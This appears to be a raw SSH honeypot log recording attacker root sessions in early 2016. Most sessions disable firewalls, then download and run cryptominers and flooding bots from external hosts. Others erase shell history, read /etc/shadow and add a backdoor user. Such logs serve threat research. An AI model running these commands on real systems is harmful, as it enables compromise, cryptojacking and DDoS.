From 37.201.242.176 7-Jan-2016 18:49:57 ssh2 root w unset HISTFILE unset HISTSAVE w uname -a cat /etc/hosts From 5.188.10.144 7-Jan-2016 23:43:01 ssh2 root cat /proc/cpuinfo exit From 213.225.6.22 9-Jan-2016 00:08:21 ssh2 root w uname -a w ls -a cat ash_history uname -a cat /proc/cpuinfo /sbin/ifconfig | grep inet -wc -l /sbin/ifconfig | grep inet -wc /sbin/ifconfig | grep inet cat /etc/hosts cd 7var/tmp cd /var/tmp ls -a cd /var ls -a cd /tmp pwd wget http://t1fix.com/u.tar tar xvf u.tar wget http://t1fix.com/u.tar mkdir .cache apt-get update yum update apt update sudo update apt-get apt-get install sudo ls -a cd .ssh ls -a last cat /etc/shadow cat /etc/passwd wget http://t1fix.com/u.tar curl -O http://t1fix.com/u.tar wget //t1fix.com/u.tar cd .. cd .. cd cd ls -a cat .bash_history cat .xauthdljiQQ From 213.225.6.22 9-Jan-2016 05:01:25 ssh2 root cd /var/tmp wget futem.pe.hu/5352353252362.txt chmod +x * perl 5352353252362.txt From 121.12.173.62 9-Jan-2016 10:49:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 777 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/duge-25 chmod 777 duge-25 ./duge-25 From 178.208.182.119 13-Jan-2016 01:49:41 ssh2 root cd /var/tmp wget http://futem.pe.hu/5352353252362.txt chmod +x * perl 5352353252362.txt wget http://futem.pe.hu/5352353252362.txt From 121.12.173.62 21-Jan-2016 12:36:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188:454/wwwww;chmod 755 wwwww;./wwwww; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188:454/wwwww chmod 755 wwwww ./wwwww From 60.10.115.187 28-Jan-2016 08:09:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f xmrminer /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop rm -f xmrminer From 121.12.173.62 30-Jan-2016 03:35:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 755 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/duge-25 chmod 755 duge-25 ./duge-25 From 60.10.115.187 30-Jan-2016 13:53:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;chmod 777 xmrminer;./xmrminer; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop chmod 777 xmrminer ./xmrminer From 110.19.181.193 3-Feb-2016 05:48:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://116.196.86.246/xmrminer;chmod 777 xmrminer;./xmrminer; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://116.196.86.246/xmrminer chmod 777 xmrminer ./xmrminer From 113.237.196.174 10-Feb-2016 03:52:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c1;chmod 777 c1;./c1;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c2;chmod 777 c2;./c2;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c3;chmod 777 c1;./c3;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c4;chmod 777 c1;./c4;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/za4;chmod 777 c1;./za4; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://113.237.196.174:6160/c1 chmod 777 c1 ./c1 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://113.237.196.174:6160/c2 chmod 777 c2 ./c2 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://113.237.196.174:6160/c3 chmod 777 c1 ./c3 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://113.237.196.174:6160/c4 chmod 777 c1 ./c4 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://113.237.196.174:6160/za4 chmod 777 c1 ./za4 From 37.228.235.137 11-Feb-2016 23:50:29 ssh2 root unset HISTFILE unset HISTSAVE unset SAVEFILE history -n w ps x sshd cat /usr/include/netda.h ps x From 121.12.173.62 12-Feb-2016 02:04:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:88/dudusyn;chmod 777 dudusyn;./dudusyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.203:88/dudusyn chmod 777 dudusyn ./dudusyn From 178.132.3.14 12-Feb-2016 04:43:33 ssh2 root ls -la nano ipcalc.pl vi ipcalc.pl cat ipcalc.pl cat /etc/hosts cat /etc/passwd vi .bastory yum apt-get apt-get install nano From 121.12.173.62 12-Feb-2016 22:46:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121udp;chmod 777 121udp;./121udp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/121udp chmod 777 121udp ./121udp From 116.196.121.240 15-Feb-2016 01:06:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://yyaog.cn:9191/cc1;chmod 777 cc1;./cc1;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://yyaog.cn:9191/cc2;chmod 777 cc2;./cc2;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://yyaog.cn:9191/cc3;chmod 777 cc3;./cc3;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://yyaog.cn:9191/cc4;chmod 777 cc4;./cc4;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://yyaog.cn:9191/cc1 chmod 777 cc1 ./cc1 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://yyaog.cn:9191/cc2 chmod 777 cc2 ./cc2 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://yyaog.cn:9191/cc3 chmod 777 cc3 ./cc3 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://yyaog.cn:9191/cc4 chmod 777 cc4 ./cc4 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop From 123.190.181.165 15-Feb-2016 20:38:45 ssh2 root Exec /etc/init.d/iptables stop /etc/init.d/iptables stop From 110.19.181.194 21-Feb-2016 13:24:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246/xmrminer;chmod 777 xmrminer;./xmrminer; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ wget -c http://116.196.86.246/xmrminer chmod 777 xmrminer ./xmrminer From 121.12.173.62 24-Feb-2016 03:52:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121syn;chmod 755 121syn;./121syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/121syn chmod 755 121syn ./121syn From 92.82.118.85 26-Feb-2016 15:31:17 ssh2 root ls w free -mt cat /proc/cpuinfo passwd sudo su cat /etc/issue perl test.pl ls ./test.pl yum apt From 122.142.49.205 27-Feb-2016 11:03:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;./xmrminer; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ wget -c http://116.196.86.246:7800/xmrminer chmod 777 xmrminer ./xmrminer From 117.131.151.154 2-Mar-2016 02:58:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;setsid ./xmrminer &>>ldevlnull; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ wget -c http://116.196.86.246:7800/xmrminer chmod 777 xmrminer setsid ./xmrminer &>>ldevlnull From 121.12.173.62 2-Mar-2016 11:48:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121syn;chmod 777 121syn;./121syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/121syn chmod 777 121syn ./121syn From 121.12.173.62 3-Mar-2016 18:51:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188syn;chmod 777 188syn;./188syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/188syn chmod 777 188syn ./188syn From 117.131.151.154 3-Mar-2016 22:56:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;killall xmrminer ;killall xmring ;rm -rf xmrminer* ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;setsid ./xmrminer &>>ldevlnull; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ killall xmrminer killall xmring rm -rf xmrminer* wget -c http://116.196.86.246:7800/xmrminer chmod 777 xmrminer setsid ./xmrminer &>>ldevlnull From 213.147.164.60 10-Mar-2016 11:14:29 ssh2 root w nproc From 121.12.173.62 12-Mar-2016 20:11:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188syn;chmod 755 188syn;./188syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/188syn chmod 755 188syn ./188syn From 185.123.101.87 15-Mar-2016 23:07:17 ssh2 root uptime cat /proc/cpuinfo ls -a w unzip exit From 121.12.173.62 19-Mar-2016 17:47:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188;chmod 755 188;./188; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/188 chmod 755 188 ./188 From 121.12.173.62 20-Mar-2016 04:08:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188771;chmod 777 188771;./188771; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/188771 chmod 777 188771 ./188771 From 121.12.173.62 21-Mar-2016 00:50:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/141x;chmod 755 141x;./141x; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/141x chmod 755 141x ./141x From 121.12.173.62 21-Mar-2016 11:11:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/141d;chmod 777 141d;./141d; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/141d chmod 777 141d ./141d From 121.12.173.62 22-Mar-2016 18:13:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/bbs;chmod 755 bbs;./bbs; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:88/bbs chmod 755 bbs ./bbs From 128.199.174.70 23-Mar-2016 04:34:53 ssh2 root Exec uname -ms uname -ms From 121.12.173.62 23-Mar-2016 14:55:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/qwer;chmod 777 qwer;./qwer; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:88/qwer chmod 777 qwer ./qwer From 121.12.173.62 24-Mar-2016 01:16:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-udp;chmod 755 duge-udp;./duge-udp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/duge-udp chmod 755 duge-udp ./duge-udp From 121.12.173.62 24-Mar-2016 21:58:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144syn;chmod 755 144syn;./144syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/144syn chmod 755 144syn ./144syn From 110.19.181.198 25-Mar-2016 17:34:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;rm -rf xm.sh;wget -c http://116.196.86.246:7800/xm.sh;chmod 777 xm.sh;sh xm.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ rm -rf xm.sh wget -c http://116.196.86.246:7800/xm.sh chmod 777 xm.sh sh xm.sh From 121.12.173.62 26-Mar-2016 15:22:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/x6z;chmod 777 x6z;./x6z; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:81/x6z chmod 777 x6z ./x6z From 121.12.173.62 27-Mar-2016 02:43:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-udp;chmod 0755 duge-udp;./duge-udp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/duge-udp chmod 0755 duge-udp ./duge-udp From 121.12.173.62 27-Mar-2016 23:25:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/771xm;chmod 755 771xm;./771xm; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/771xm chmod 755 771xm ./771xm From 121.12.173.62 28-Mar-2016 09:46:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/Linux-syn1991;chmod 777 Linux-syn1991;./Linux-syn1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/Linux-syn1991 chmod 777 Linux-syn1991 ./Linux-syn1991 From 121.12.173.62 29-Mar-2016 06:28:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144udp;chmod 755 144udp;./144udp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/144udp chmod 755 144udp ./144udp From 121.12.173.62 30-Mar-2016 03:10:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/google;chmod 777 google;./google; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/google chmod 777 google ./google From 121.12.173.62 30-Mar-2016 13:31:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144udp;chmod 755 10123/144udp;./10123/144udp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/144udp chmod 755 10123/144udp ./10123/144udp From 121.12.173.62 30-Mar-2016 23:52:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/231.exe;chmod 777 231.exe;./231.exe; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/231.exe chmod 777 231.exe ./231.exe From 121.12.173.62 1-Apr-2016 06:55:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144syn;chmod 777 144syn;./144syn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/144syn chmod 777 144syn ./144syn From 121.12.173.62 1-Apr-2016 17:16:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.115.117:88/ssd;chmod 755 ssd;./ssd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.147.115.117:88/ssd chmod 755 ssd ./ssd From 121.12.173.62 4-Apr-2016 17:42:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/121771;chmod 777 121771;./121771; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:81/121771 chmod 777 121771 ./121771 From 121.12.173.62 5-Apr-2016 04:03:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/121991;chmod 755 121991;./121991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:81/121991 chmod 755 121991 ./121991 From 121.12.173.62 5-Apr-2016 14:24:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/syn1991;chmod 777 syn1991;./syn1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/syn1991 chmod 777 syn1991 ./syn1991 From 121.12.173.62 6-Apr-2016 00:45:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.115.117:88/ssd;chmod 777 ssd;./ssd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.147.115.117:88/ssd chmod 777 ssd ./ssd From 121.12.173.62 7-Apr-2016 18:09:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/udp25000;chmod 755 udp25000;./udp25000; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:10123/udp25000 chmod 755 udp25000 ./udp25000 From 213.147.166.55 8-Apr-2016 03:26:56 ssh2 root w last cat /proc/cpuinfo rproc apt-get apt-get install nano apt-get install gcc apt-get install gcc install gcc g install gcc apt-get install wget apt-get apt-get install apt-get install wget apt-get install curl curl apt-get update apt-get install alsa-utils apt-get install update yum apt-get install yum cd / ls -a cd ls -a cd /root ls -a cat .listing cd /home ls -a cat /etc/paswd cat /etc/pasws cat /etc/passd cat /etc/passwd cat /etc/issue uname -a sudo su su cd ls -a cd /var/www ls -a ls -al ls cd /var/tmop cd /var/tm cd /var/tmp ls nano ip nano ipcalc.pl vi ipcalc.pl apt-get install vi ls ls -a ps -x w kill -9 22262 ls -a ps -x kill -9 22262 ps -x killall -9 auth reboot restart kill -9 -1 ps -x From 213.147.166.55 8-Apr-2016 09:49:57 ssh2 root w uname -a nproc cat/p cat /proc/cpuinfo cd /var/tmp ls -a cat .bash_history cat .mysql_history cat .xauthdljiQQ pwd cd /&deV/shm cd / cd /dev/shm ls -a wget http://rekon.altervista.org/irc/bnc.tgz tar zxvf bnc.tgz rm -rf bnc.tgz cd .bash chmod +x * wget http://rekon.altervista.org/irc/bnc.tgz curl -O wget 138.201.222.27/irc/bnc.tgz wget -r wget -rd wget -O wget datafresh.org/cartier.tgz ftp From 213.147.166.55 8-Apr-2016 14:43:01 ssh2 root w last cat /proc/cpuinfo rproc apt-get apt-get install nano apt-get install gcc apt-get install wget apt-get apt-get install apt-get install wget apt-get install curl curl apt-get update apt-get install alsa-utils apt-get install update yum apt-get install yum cd / ls -a cd ls -a cd /root ls -a cat .listing cd /home ls -a cat /etc/paswd cat /etc/pasws cat /etc/passd cat /etc/passwd cat /etc/issue uname -a sudo su su cd ls -a cd /var/www ls -a ls -al ls cd /var/tmop cd /var/tm cd /var/tmp ls nano ip nano ipcalc.pl vi ipcalc.pl apt-get install vi ls ls -a ps -x w kill -9 22262 ls -a ps -x kill -9 22262 ps -x killall -9 auth reboot restart kill -9 -1 ps -x From 103.89.90.28 8-Apr-2016 19:36:05 ssh2 root /usr/sbin/useradd -o -u 10 r/sbin/useradd -o -u 10 /usr/sbin/useradd -o -u 1000 uglyduck useradd cat /etc/shadow cat /etc/shadows wget wget datafresh.org/cartier.tgz ps -x ps -A kill -9 22244 sh bash reboot restart w last cd ls -a cd .. ls -a ls cd nsmail ls -a ls From 121.12.173.62 9-Apr-2016 01:12:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/xudp;chmod 777 xudp;./xudp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:88/xudp chmod 777 xudp ./xudp From 121.12.173.62 13-Apr-2016 19:03:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/Linux-udp1991;chmod 755 Linux-udp1991;./Linux-udp1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/Linux-udp1991 chmod 755 Linux-udp1991 ./Linux-udp1991 From 121.12.173.62 14-Apr-2016 05:24:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/Linux-syn1991;chmod 777 Linux-syn1991;./Linux-syn1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/Linux-syn1991 chmod 777 Linux-syn1991 ./Linux-syn1991 From 60.10.114.158 15-Apr-2016 03:01:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.120.20:7800/syn;chmod 777 syn;setsid ./syn &>>ldevlnull; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ wget -c http://116.196.120.20:7800/syn chmod 777 syn setsid ./syn &>>ldevlnull From 60.10.114.158 15-Apr-2016 12:47:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;chmod 777 syn;setsid ./syn &>>ldevlnull; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ chmod 777 syn setsid ./syn &>>ldevlnull From 222.186.56.5 18-Apr-2016 12:53:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141:81/123;chmod 777 123;./123; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.161.141:81/123 chmod 777 123 ./123 From 222.186.56.5 19-Apr-2016 19:56:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141:81/UDP_25;chmod 755 UDP_25;./UDP_25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.161.141:81/UDP_25 chmod 755 UDP_25 ./UDP_25 From 222.186.56.5 20-Apr-2016 06:17:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c 222.186.56.5:8080/duge_SYN;chmod 777 duge_SYN;./duge_SYN; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c 222.186.56.5:8080/duge_SYN chmod 777 duge_SYN ./duge_SYN From 5.189.139.2 20-Apr-2016 10:00:53 ssh2 root Exec uname -a && cat /etc/issue uname -a && cat /etc/issue From 222.186.56.5 21-Apr-2016 13:20:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141/bs;chmod 755 bs;./bs; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.161.141/bs chmod 755 bs ./bs From 222.186.56.5 21-Apr-2016 23:41:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_SYN;chmod 777 duge_SYN;./duge_SYN; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:8080/duge_SYN chmod 777 duge_SYN ./duge_SYN From 222.186.56.5 22-Apr-2016 10:02:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_SYN;chmod 755 duge_SYN;./duge_SYN; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:8080/duge_SYN chmod 755 duge_SYN ./duge_SYN From 222.186.58.136 25-Apr-2016 10:29:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:7716/NNZZT;chmod 777 NNZZT;./NNZZT; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.136:7716/NNZZT chmod 777 NNZZT ./NNZZT From 222.186.56.5 25-Apr-2016 20:50:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:81/duge_SYN;chmod 777 duge_SYN;./duge_SYN; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:81/duge_SYN chmod 777 duge_SYN ./duge_SYN From 222.186.56.5 26-Apr-2016 07:11:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:81/duge_SYN;chmod 755 duge_SYN;./duge_SYN; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:81/duge_SYN chmod 755 duge_SYN ./duge_SYN From 222.186.56.5 29-Apr-2016 07:38:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 